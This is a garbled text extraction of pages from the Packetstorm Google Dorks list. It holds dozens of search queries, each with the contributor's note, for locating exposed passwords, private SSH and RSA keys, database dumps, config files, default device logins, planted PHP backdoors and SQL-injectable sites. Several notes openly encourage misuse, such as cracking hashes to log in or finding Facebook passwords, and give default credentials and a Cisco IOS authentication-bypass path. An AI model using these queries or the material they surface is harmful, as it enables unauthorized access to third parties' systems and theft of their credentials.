intext:"root:x:0:0:root:/root:/bin/bash" inurl:*=/etc/passwd

Author: ./tic0 | Izzudin al-QassamCyber Fighter

Serv-U (c)Copyright 1995-2013 RhinoSoftware, Inc. AllRights.Reserved.

Serv-U (c) Copyright 1995-2013Rhino Software, Inc. AllRights.Reserved.

# Category: FTP Login Portals #Description : Dork for finding FTPLogin portals # Google Dork: Serv-UCopyright 1995-2013 Rhino Software,Inc. All Rights.Reserved. # Date:16/04/2013 # Exploit Author: ArulKumar.V # Vendor Homepage:www.serv-u.com # Email :[email protected] Thank you

intext: + PHP! + intext: + PHP! +

Google search:intext: + PHP! +DORK: + PHP! +Description:Unrestricted FileUpload(Allow User To Uploadmalicious Files) Author:Bhavya ShuklaTwitter:@bhavya_shukla_

allintext:/iissamples/default/

allintext: /iissamples/default/

Searching for "allintext:/iissamples/default/" may provideinteresting information about a mis-configured .asp server including rawsource code for asp, directory structureand the IIS version ( especially usefulwhen IIS is running on NT 4.0) theresult provides a way to further exploredirectory structure for juicy info. Oleg.

intitle:"VNCViewer for Java" intitle:"VNC Viewer for Java" VNC Viewer for Java ~4N6 Security~

inurl:"zendesk.co inurl:"zendesk.com/attachments/tok zendesk is good ticketing system . It

Page 462: Packetstorm Google Dorks List

m/attachments/token"site:zendesk.com

en" site:zendesk.com has thousands of clients. with the abovedork you can see the clients internalfile attachments of the tickets . Thesefile can be opened by anyone becausethey are not maintaining anyauthentication token for thisattachments Internal source codes,doubts, ip's , passwords, can bedisclosed in the attachments

inurl:"dasdec/dasdec.csp" inurl:"dasdec/dasdec.csp"

inurl:"dasdec/dasdec.csp" DASDEC IIEmergency Alert System User Manual:http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdf Defaultusername: Admin Default password:dasdec

"information_schema" filetype:sql "information_schema" filetype:sql Dork: "information_schema"

filetype:sql By: Cr4t3r

intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1

intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1

# Exploit Title: google dork for apachedirectory listing by url edit # GoogleDork: intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1 in this query you seethat text file but by url we can travel inparen directory # Date: 11/7/2013 #Exploit Author: james love india #Tested on: windows xp sp2

intitle:index.ofintext:.bash_history

intitle:index.of intext:.bash_history

the GHDB on subject (intitle:index.ofintext:.bash_history) finds all homeusers directory path indexed. I've test itand google return 943 results! -AndreaMenin

intitle:"CiscoIntegratedManagementController Login"

intitle:"Cisco IntegratedManagement Controller Login"

intitle:"Cisco Integrated ManagementController Login" The Cisco IntegratedManagement Controller (CIMC) is themanagement service for the C-Seriesservers. CIMC is built into themotherboard. This Google dorksearches for the CIMC GUI loginportal for remote access. ax_

inurl:/secure/Dashboard.jspaintitle:"SystemDashboard"

inurl:/secure/Dashboard.jspaintitle:"System Dashboard"

Finds login pages and systemdashboards for Atlassian's JIRA. -Andy G - twitter.com/vxhex

inurl:.php? inurl:.php? inurl:.php?

Page 463: Packetstorm Google Dorks List

intext:CHARACTER_SETS,COLLATIONS,?intitle:phpmyadmin

intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin

intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin viewphpMyAdmin of web sites Author:Un0wn_X Follow: @UnownSec E-Mail: [email protected]

inurl:fluidgalleries/dat/login.dat inurl:fluidgalleries/dat/login.dat

Works with every single fluidgalleriesportofolio sites. Just decrypt the MD5hash and login ontourl.extension/admin.php with theusername from the search result andwith the decrypted MD5 hash. Dork byKraze ([email protected])

inurl:5000/webman/index.cgi inurl:5000/webman/index.cgi Synology nas login

inurl:wp-content/uploads/dump.sql

inurl:wp-content/uploads/dump.sql

This is *Mohan Pendyala* (penetrationtester) from india. Google Dork:*inurl:wp-content/uploads/dump.sql* ** The *Dump.sql* file reveals totalinfo about the database tables, Users,passwords..etc

intitle:"InternetSecurityAppliance" &intext:"EnterPassword andclick Login"

intitle:"Internet Security Appliance"& intext:"Enter Password and clickLogin"

#Summary: ZyWall Firewall loginportal #Category: Various OnlineDevices #Author: g00gl3 5c0u7

inurl:1337w0rm.phpintitle:1337w0rm

inurl:1337w0rm.phpintitle:1337w0rm

Finds websites that have 1337w0rm'sCPanel cracker uploaded. Since theCracker is relatively new, some sitesmight not use it. -TehMysticaL

intitle:".::Welcome to theWeb-BasedConfigurator::." &intext:"Welcometo your routerConfigurationInterface"

intitle:".:: Welcome to the Web-Based Configurator::." &intext:"Welcome to your routerConfiguration Interface"

#Summary: ZyXEL router login portal#Category: Pages containing loginportals #Author: g00gl3 5c0u7 NOTE:currently exists this ->http://www.exploit-db.com/ghdb/270/but only shows 8 results against 63100that i sent, also covers more models.

intext:"I'm using apublic or sharedcomputer" &intext:"RemoteWeb Workplace"

intext:"I'm using a public or sharedcomputer" & intext:"Remote WebWorkplace"

#Summary: Windows Business Server2003 Login portal #Category: Pagescontaining login portals #Author:g00gl3 5c0u7

Page 464: Packetstorm Google Dorks List

inurl:"/secure/login.aspx" inurl:"/secure/login.aspx"

#Summary: Several Web Pages LoginPortal #Category: Pages containinglogin portals #Author: g00gl3 5c0u7

intitle:"WeatherWing WS-2" intitle:"Weather Wing WS-2"

#Summary:Weather Wing(http://www.meteo-system.com/ws2.php) Portal.#Category: Various Online Divices#Author: g00gl3 5c0u7

intitle:"NetBotzNetworkMonitoringAppliance"

intitle:"NetBotz NetworkMonitoring Appliance"

#Summary:Various Online Divices#Category: Pages containing loginportals #Author: g00gl3 5c0u7

intitle:"Transponder/EOLConfiguration:"inurl:asp

intitle:"Transponder/EOLConfiguration:" inurl:asp

#Summary: Cheeta TechnologiesTransponder Configuration Portal (*http://www.cheetahtech.com).*#Author: g00gl3 5c0u7

intitle:"WAMPSERVER Homepage"& intext:"ServerConfiguration"

intitle:"WAMPSERVERHomepage" & intext:"ServerConfiguration"

#Summary: Wampserver Homepagefree access(*http://www.wampserver.com/).*#Author: g00gl3 5c0u7

intitle:"Web ImageMonitor" &inurl:"/mainFrame.cgi"

intitle:"Web Image Monitor" &inurl:"/mainFrame.cgi"

#Summary: Several printers that use"Web Image Monitor" control panel (http://ricoh.pbworks.com/w/page/14063393/CSWebImageMonitor). Useddefault by Ricoh, Lanier and others.#Author: g00gl3 5c0u7

inurl:8080intitle:"Dashboard[Jenkins]"

inurl:8080 intitle:"Dashboard[Jenkins]"

#Summary: Acces to JenkinsDashboard #Author: g00gl3 5c0u7

intitle:"Login -OTRS" inurl:pl intitle:"Login - OTRS" inurl:pl #Summary: OTRS login portals

#Author: g00gl3 5c0u7intitle:"WebMail |Powered byWinmail Server -Login" &(intext:"Username" &intext:"Password")

intitle:"WebMail | Powered byWinmail Server - Login" &(intext:"Username" &intext:"Password")

#Summary: Winmail login portals#Author: g00gl3 5c0u7

inurl:8080intitle:"login"intext:"UserLogin""English"

inurl:8080 intitle:"login"intext:"UserLogin" "English"

#Summary: VoIP login portals#Category: Pages containing loginportals #Author: g00gl3 5c0u7

intitle:"::: Login intitle:"::: Login :::" & #Summary: Surveillance login portals

Page 465: Packetstorm Google Dorks List

:::" &intext:"CustomerLogin" & "Anytime & Anywhere"

intext:"Customer Login" & "Anytime & Any where"

#Author: g00gl3 5c0u7

inurl:phpmyadmin/index.php &(intext:username& password &"Welcome to")

inurl:phpmyadmin/index.php &(intext:username & password &"Welcome to")

#Summary: PHP Admin login portals#Author: g00gl3 5c0u7

inurl:~~joomla3.txt filetype:txt inurl:~~joomla3.txt filetype:txt

By this dork you can find juicyinformation joomla configuration filesAuthor: Un0wn_X

filetype:txtinurl:~~Wordpress2.txt

filetype:txt inurl:~~Wordpress2.txtThis dork can be used to findsymlinked Wordpress configurationfiles of other web sites

-site:simplemachines.org "These arethe paths andURLs to yourSMF installation"

-site:simplemachines.org "These arethe paths and URLs to your SMFinstallation"

Dork: -site:simplemachines.org "Theseare the paths and URLs to your SMFinstallation" Details: This google dorkfinds sites with the Simple Machinesrepair_settings.php file uploaded to theroot directory. This givesunauthenticated access to the SQLusername and password for the forum.

intitle:"index of"myshare intitle:"index of" myshare

Google search for shared HDDdirectories or shared directories onservers. Gives access to oftenunconsciously shared documents,programs or sensitive information.Also are often other directories onthese drives accessible. Dork by :redN00ws

intitle:"SPA504GConfiguration" intitle:"SPA504G Configuration"

Dork : intitle:"SPA504GConfiguration" Result : Gives access toCisco SPA504G Configuration Utilityfor IP phones Screenshot Google DorkDork found by : redN00ws

inurl:"/cgi-mod/index.cgi" inurl:"/cgi-mod/index.cgi"

Returns login pages for variousBarracuda Networks branded hardwarespam filters and mail archivers. 4N6Security

inurl:"/webcm?getpage=" inurl:"/webcm?getpage=" Returns various Actiontec (and often

Qwest) branded routers' login pages.

Page 466: Packetstorm Google Dorks List

4N6 Securityintitle:"Web Clientfor EDVS" intitle:"Web Client for EDVS" Yet another DVR system. Probably

requires Java to display. 4N6 Securityintitle:index.ofintext:.ssh intitle:index.of intext:.ssh Find peoples ssh public and private

keys - tmc / #havokinurl:*/webalizer/*intitle:"UsageStatistics"

inurl:*/webalizer/* intitle:"UsageStatistics" *Obrigado,*

intitle:"ComrexACCESS Rack" intitle:"Comrex ACCESS Rack"

IP Codecs offering "studio qualityaudio and video over wired andwireless IP circuits". Used in studio-grade radio broadcasting over the web.More product information here:http://www.comrex.com/products.html.This Google search will return (some,but not hundreds of) web-facing loginportals for this type of device. RequiresJavaScript and Flash for viewer towork. Default login: comrex comrex.4N6 Security

site:github.cominurl:sftp-config.jsonintext:/wp-content/

site:github.com inurl:sftp-config.json intext:/wp-content/

Finds disclosed ftp FTP for Wordpressinstalls, which have been pushed to apublic repo on GitHub. Credit:RogueCoder

filetype:phpintext:"PROJECTHONEY POTADDRESSDISTRIBUTIONSCRIPT"

filetype:php intext:"PROJECTHONEY POT ADDRESSDISTRIBUTION SCRIPT"

Project Honey Pot anti-spammerdetection(http://www.projecthoneypot.org/) Canidentify the honeypot and get the site'shoneypot keys -- -[Voluntas VincitOmnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

inurl:config "fetch=+refs/heads/*:refs/remotes/origin/*"

inurl:config "fetch =+refs/heads/*:refs/remotes/origin/*"

Git config file Easy way to find GitRepositories -- -[Voluntas VincitOmnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

intitle:"IPCamClient" intitle:"IPCam Client"

Foscam IPCam By default thesecameras attach to the myfoscam.orgDDNS. So you could addsite:myfoscam.org. On the otherhand if

Page 467: Packetstorm Google Dorks List

you're hunting for DDNS servers, youcould negate that site and examine theother results. -- -[Voluntas VincitOmnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

inurl:/wp-content/uploads/filetype:sql

inurl:/wp-content/uploads/filetype:sql

Google dork for WordPress databasebackup file (sql): inurl:/wp-content/uploads/ filetype:sql By sm0k3(http://sm0k3.net - Sm0k3 HQ)_________________ With regards,sm0k3 Any questions: [email protected] issues:[email protected] Want to submit anorder: [email protected] Jabber:[email protected] Blog:http://sm0k3.net

site:github.cominurl:"known_hosts" "ssh-rsa"

site:github.cominurl:"known_hosts" "ssh-rsa"

Finds SSH known_hosts files onGitHub. - Andy G - twitter.com/vxhex

site:github.cominurl:"id_rsa" -inurl:"pub"

site:github.com inurl:"id_rsa" -inurl:"pub"

Finds private SSH keys on GitHub. -Andy G - twitter.com/vxhex

inurl:"/module.php/core/loginuserpass.php"

inurl:"/module.php/core/loginuserpass.php"

Finds SimpleSAMLphp login pages. -Andy G - twitter.com/vxhex

inurl:"/jenkins/login" "Pagegenerated"

inurl:"/jenkins/login" "Pagegenerated"

Finds login pages for Jenkinscontinuous integration servers. - AndyG - twitter.com/vxhex

"inurl:/data/nanoadmin.php" "inurl:/data/nanoadmin.php"

Hi, I would like to submit this GHDBwhich allow to find out nanoCMSadministration pages :*inurl:"/data/nanoadmin.php"* Bestregards, Antonino Napoli

intitle:"uploaderby ghost-dz"ext:php

intitle:"uploader by ghost-dz"ext:php intitle:"uploader by ghost-dz" ext:php

filetype:bak(inurl:php |inurl:asp | inurl:rb)

filetype:bak (inurl:php | inurl:asp |inurl:rb)

This one could be used to find all sortsof backup data, but this example islimited to just common webappextensions -- -[Voluntas VincitOmnia]- website

Page 468: Packetstorm Google Dorks List

http://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

intitle:"index of"intext:".ds_store" intitle:"index of" intext:".ds_store"

Mac OSX directories -- -[VoluntasVincit Omnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

inurl:tarfiletype:gz inurl:tar filetype:gz

Tar files Contain user and groupinformation (in addition to potentiallyuseful files) -- -[Voluntas VincitOmnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

intitle:"RT at aglance"intext:"quicksearch"

intitle:"RT at a glance"intext:"quick search"

RT Request Tracker Ticket Databasehttp://www.bestpractical.com/rt/ -- -[Voluntas Vincit Omnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

inurl:"jmx-console/HtmlAdaptor" intitle:Mbean

inurl:"jmx-console/HtmlAdaptor"intitle:Mbean

JBosshttp://docs.jboss.org/jbossas/docs/Server_Configuration_Guide/4/html/Connecting_to_the_JMX_Server-Inspecting_the_Server___the_JMX_Console_Web_Application.html -- -[Voluntas Vincit Omnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

filetype:phpintext:"!C99Shellv. 1.0 beta"

filetype:php intext:"!C99Shell v. 1.0beta"

php backdoor: c99 shell -- -[VoluntasVincit Omnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

filetype:xmlinurl:sitemap filetype:xml inurl:sitemap

Sitemaps, the opposite of Web RobotsExclusion Detail directory and pagemap -- -[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+https://plus.google.com/u/0/114827336297709201563

filetype:jnlp filetype:jnlp Java Web Start (Java Network Launch

Page 469: Packetstorm Google Dorks List

Protocol) -- -[Voluntas Vincit Omnia]-website http://www.erisresearch.org/Google+https://plus.google.com/u/0/114827336297709201563

inurl:mikrotikfiletype:backup inurl:mikrotik filetype:backup

mikrotik url backups uploaded.. then..credentials cracked viahttp://mikrotikpasswordrecovery.comBest Regards, kn0wl13dg3 - underc0deteam.- www.underc0de.orgkn0w13dg3.blogspot.com

'apc info''apc.php?SCOPE=' 'apc info' 'apc.php?SCOPE='

This dork will locate Unsecured PHPAPC Installations. With regards,Shubham Mittal (Hack PlanetTechnologies) http://hackplanet.in

intext: intext:intext: intext:intext:

intext: intext: intext: intext: intext:

More than 100k sites affected It willshow asp sites that are vulnerable to sqlinjection (These links actually showpages which are attacked by mass SqlInjection...which means they arevulnerable to sql Injection) #Author ----- pgolecha Palash Golecha twitter-@pgolecha12

ext:xml("mode_passive"|"mode_default")

ext:xml("mode_passive"|"mode_default")

OffSec: So the dork is: ext:xml("mode_passive"|"mode_default") Thisdork finds Filezilla XML files. To bemore specific; recentservers.xmlsitemanager.xml filezilla.xml Thesefiles contain clear text usernames andpasswords. They also contain thehostname or IP to connect to as well asthe port. Most of these results will befor FTP however, you can also get port22 to SSH in. This dork of course canbe modified to target a specific websiteby appending site:whateversite.com.You can also look for a specificusername like root by appending "root"to the dork. Regards, necrodamushttp://www.twitter.com/necrodamus2600http://www.photobucket.com/profile/necrodamus2600

filetype:xls filetype:xls "username | password" filetype:xls "username | password" This

Page 470: Packetstorm Google Dorks List

"username |password"

search reveals usernames and/orpasswords of the xls documents. byStakewinner00

inurl:ckfinderintext:"ckfinder.html" intitle:"Indexof /ckfinder"

inurl:ckfinder intext:"ckfinder.html"intitle:"Index of /ckfinder"

Dork: inurl:ckfinderintext:"ckfinder.html" intitle:"Index of/ckfinder" Use this dork to find rootdirectory of CKFinder (all versions)with ckfinder.html file (used to upload,modify and delete files on the server)Submitted by: CodiObert

intitle:C0ded Byweb.sniper intitle:C0ded By web.sniper

User & Domain || Symlink Using thisdork you can find the User and theDomains of the Server... intitle:C0dedBy web.sniper Author: Un0wn_X

inurl:.com/configuration.php-dist inurl:.com/configuration.php-dist

Finds the configuration files of thePHP Database on the server. ByChintan GurjarRahul Tygi

intitle:"PyxisMobile Test Page"inurl:"mpTest.aspx"

intitle:"Pyxis Mobile Test Page"inurl:"mpTest.aspx"

Pyxis Mobile Test Page intitle:"PyxisMobile Test Page" inurl:"mpTest.aspx"

inurl:finger.cgi inurl:finger.cgi Finger Submitted by: Christy PhilipMathew

inurl:32400/web/index.html inurl:32400/web/index.html

Submitting this for the GHDB. Theseare web accessible Plex Media Serverswhere you can watch/listen to otherpeople's media collections. FYI

"parent directory"proftpdpasswdintitle:"index of" -google

"parent directory" proftpdpasswdintitle:"index of" -google

This dork is based on this:http://www.exploit-db.com/ghdb/1212/but improved cause that is useless,instead of this: "parent directory"proftpdpasswd intitle:"index of" -google Best regards, Nemesis

intitle:"dd-wrtinfo"intext:"Firmware:DD-WRT"

intitle:"dd-wrt info"intext:"Firmware: DD-WRT"

This dork finds web interfaces ofvarious routers using custom firmwareDD-WRT. Default login: root Defaultpassword: admin greetings, uA

inurl:"/level/13|14|15/exec/" inurl:"/level/13|14|15/exec/"

inurl:"/level/13|14|15/exec/" Cisco IOSHTTP Auth Vulnerability .. Commandbefore exec/ . Example exec/-/?

inurl:"r00t.php" Re: inurl:"r00t.php"This dork finds websites that werehacked, backdoored and contains theirsystem information e.g: Linux

Page 471: Packetstorm Google Dorks List

web.air51.ru 2.6.32-41-server #89-Ubuntu SMP Fri Apr 27 22:33:31 UTC2012 x86_64. Jay Turla a.k.a shipcode

inurl:"/dbman/default.pass" inurl:"/dbman/default.pass"

A path to a DES encrypted passwordfor DBMan ( http://www.gossamer-threads.com/products/archive.html)ranging from Guest to Admin account,this is often found coupled with cgi-telnet.pl ( http://www.rohitab.com/cgi-telnet) which provides an admin login,by default and the password providedby DBMan's path /dbman/default.pass Ihave already posted this to packetstormon June 7th 2004, calledcgitelnetdbman (http://packetstormsecurity.org/files/29530/cgitelnetdbman.pdf.html) The 'Dork'is *inurl:"/dbman/default.pass" *Lawrence Lavigne (ratdance) -suidrewt

inurl:"InfoViewApp/logon.jsp" inurl:"InfoViewApp/logon.jsp"

Google Hacking *SAP Business Object3.1 XI* inurl:"InfoViewApp/logon.jsp"twitter @firebitsbr

inurl:phpliteadmin.php inurl:phpliteadmin.php The default password is 'admin'

inurl:"Orion/SummaryView.aspx"intext:"OrionCore"

inurl:"Orion/SummaryView.aspx"intext:"Orion Core"

Hello, Enumerate Solarwinds Orionnetwork monitoring portals. In somecases, the portal can be accessedwithout authenticating. -Sean

allinurl:"User_info/auth_user_file.txt"

allinurl:"User_info/auth_user_file.txt"

Google dork for find user info andconfiguration password of DCForumallinurl:"User_info/auth_user_file.txt" -Ajith Kp

intext:"Fatal error:Class 'Red_Action'not found in"

intext:"Fatal error: Class'Red_Action' not found in"

Dork to find Plugin errors in wordpresswebsites Dork - intext:"Fatal error:Class 'Red_Action' not found in"

inurl:newsnab/www/automated.config.php

inurl:newsnab/www/automated.config.php

Usenet Accounts from Newsnabconfigs inurl:newsnab/www/automated.config.php Author:rmccurdy.com yay free newsgroupaccess !*********************************************************************** The information in thisemail is confidential and may be

Page 472: Packetstorm Google Dorks List

legally privileged. It is intended solelyfor the addressee. Access to this emailby anyone else is unauthorized. If youare not the intended recipient, anydisclosure, copying, distribution or anyaction taken or omitted to be taken inreliance on it, is prohibited and may beunlawful. When addressed to ourclients any opinions or advicecontained in this email are subject tothe terms and conditions expressed inthe governing KPMG clientengagement letter.***********************************************************************

inurl:adminintext:username=AND email= ANDpassword= ORpass= filetype:xls

inurl:admin intext:username= ANDemail= AND password= OR pass=filetype:xls

-- nitish mehta

you really shouldfix this securityhole by setting apassword for user'.root'.inurl:/phpmyadmin intitle:localhost

you really should fix this securityhole by setting a password for user'.root'. inurl:/phpmyadminintitle:localhost

Gives sites with default username rootand no password -- nitish mehta

inurl:/wp-content/w3tc/dbcache/

inurl:/wp-content/w3tc/dbcache/ - Jay Townsend

runtimevarsoftwareVersion= runtimevar softwareVersion=

Hits: 807 Config file from Thomsonhome routers, sometimes it containspassword's and user's encryptedContains ACS servers info from ISP's

site:login.*.* site:login.*.*

DORK:site:login.*.* Description:Allow User To View Login Panel OfMany WebSites.. Author:MTKDATED: 13-1-1

ext:xml("proto='prpl-'" |"prpl-yahoo" |"prpl-silc" | "prpl-icq")

ext:xml ("proto='prpl-'" | "prpl-yahoo" | "prpl-silc" | "prpl-icq")

*Google Search:*https://www.google.com/search?q=ext:xml%20(%22proto='prpl-'%22%20|%20%22prpl-yahoo%22%20|%20%22prpl-

Page 473: Packetstorm Google Dorks List

silc%22%20|%20%22prpl-icq%22)*Description:* Find Accounds andPasswords from Pidgin Users. Googlelimit queries to 32 words so it?simpossible to search for all Account-Types in one query! List of all Params:Feel free to build your own searchquery. proto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour; prpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn; prpl-gtalk;prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah; prpl-irc; prpl-yabber*Author:* la.usch.io

ext:gnucash ext:gnucash

*Google Search:*http://www.google.com/search?q=ext:gnucash *Description:* Find GnucashDatabases containing juicy info.*Author:* http://la.usch.iohttps://www.twitter.com/la_usch -------------------------------------------------------- Cheers L@usch Web:http://la.usch.io Twitter:https://www.twitter.com/la_usch

filetype:inc ORfiletype:bak ORfiletype:oldmysql_connect ORmysql_pconnect

filetype:inc OR filetype:bak ORfiletype:old mysql_connect ORmysql_pconnect

Aggregates previous mysql_(p)connectgoogle dorks and adds a new filetype.Searches common file extensions usedas backups by PHP developers. Theseextensions are normally not interpretedas code by their server, so theirdatabase connection credentials can beviewed in plaintext. - Andy G -twitter.com/vxhex

intext:SQL syntax&inurl:index.php?=id & inurl:gov &inurl:gov

intext:SQL syntax &inurl:index.php?=id & inurl:gov &inurl:gov

# Exploit Title: SQLI Exploit # GoogleDork: intext:SQL syntax &inurl:index.php?=id & inurl:gov &inurl:gov # Date: 25/December/2012 #Exploit Author: BeastarStealacar #Vendor Homepage: http://devil-zone.net/

filetype:sqlinsite:pass &&user

filetype:sql insite:pass && user

Google Dork: filetype:sql insite:pass&& user We Can get login usernameand password details from .sql file.Author: BlacK_WooD

Page 474: Packetstorm Google Dorks List

filetype:txtinurl:wp-config.txt filetype:txt inurl:wp-config.txt

Easily hunt the Wordpressconfiguration file in of remote websites Author : Un0wn_X

"BEGIN RSAPRIVATE KEY"filetype:key -github

"BEGIN RSA PRIVATE KEY"filetype:key -github To find private RSA Private SSL Keys

site:github.cominurl:sftp-config.json

site:github.com inurl:sftp-config.json

Find disclosed FTP login credentials ingithub repositories Credit: RogueCoder

"Welcome tophpMyAdmin" +"Username:" +"Password:" +"Language:" +"Afrikaans"

"Welcome to phpMyAdmin" +"Username:" + "Password:" +"Language:" + "Afrikaans"

Finds cPanel login pages. - Andy G -twitter.com/vxhex

inurl:github.comintext:sftp-conf.json+intext:/wp-content/

inurl:github.com intext:sftp-conf.json +intext:/wp-content/

Find FTP logins and full pathdisclosures pushed to githubinurl:github.com intext:sftp-conf.json+intext:/wp-content/ -- RogueCoder

allinurl:"owa/auth/logon.aspx" -google -github

allinurl:"owa/auth/logon.aspx" -google -github

[+] Description - Find OWA loginportals Regards, necrodamushttp://www.twitter.com/necrodamus2600

intitle:Priv8 SCR Re: intitle:Priv8 SCR I am Un0wn_X Symlink User configsintitle:Priv8 SCR

filetype:configinurl:web.configinurl:ftp

filetype:config inurl:web.configinurl:ftp

This google dork to find sensitiveinformation of MySqlServer , "uid, andpassword" in web.config through ftp..filetype:config inurl:web.configinurl:ftp -Altamimi

intitle:"RouterOSrouterconfigurationpage"

intitle:"RouterOS routerconfiguration page"

Returns login portals for Microtikrouters running RouterOS version 5and up. 4N6 Security

inurl:*/graphs*intitle:"Traffic andsystem resourcegraphing"

inurl:*/graphs* intitle:"Traffic andsystem resource graphing"

With this search you can view resultsfor mikrotik graphics interfaces*Obrigado,*

inurl:"struts"filetype:action inurl:"struts" filetype:action

Google search for actoin files wichcould be explotable via CVE-2013-2251 "Multiple Remote Command

Page 475: Packetstorm Google Dorks List

Execution Vulnerabilities in ApacheStruts"

ext:sqlintext:@hotmail.com intext:password

ext:sql intext:@hotmail.com intext:password

By , NItish Mehta ,www.illuminativeworks.com/bloghttps://www.facebook.com/illuminativeworks Illuminative Works(CEO &Founder )

intext:phpMyAdmin SQL Dumpfiletype:sqlintext:INSERTINTO `admin`(`id`, `user`,`password`)VALUES -github

intext:phpMyAdmin SQL Dumpfiletype:sql intext:INSERT INTO`admin` (`id`, `user`, `password`)VALUES -github

intext:phpMyAdmin SQL Dumpfiletype:sql intext:INSERT INTO`admin` (`id`, `user`, `password`)VALUES -github How This Work?This dork will searches databasesphpMyAdmin. Searches only sqlformats and founds admin usernameand passwords to use this informationto login as administrator Sorry for myenglish. I'm not a native speaker

filetype:passwordjmxremote filetype:password jmxremote

Passwords for Java ManagementExtensions (JMX Remote) Used byjconsole, Eclipse's MAT, Java VisualVM, JmxClihttp://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html-- -[Voluntas Vincit Omnia]- websitehttp://www.erisresearch.org/ Google+https://plus.google.com/u/0/114827336297709201563

inurl:/control/userimage.html inurl:/control/userimage.html Mobotix webcam search. yet another

newer search

inurl:/administrator/index.php?autologin=1

inurl:/administrator/index.php?autologin=1

Title: google hacking username andpassword of joomla Google Dork:inurl:/administrator/index.php?autologin=1 Date: 2013-11-30 Author:Ashiyane Digital Security TeamSoftware Link: www.joomla.org/Version: joomla 2.5 Location:/administrator/index.php?autologin=1&passwd=[password]&username=[username]

ext:sqlintext:@gmail.com intext:password

ext:sql intext:@gmail.comintext:password author:haji

intext:charset_test= email=

intext:charset_test= email=default_persistent= find facebook email and password ;)

Page 476: Packetstorm Google Dorks List

default_persistent=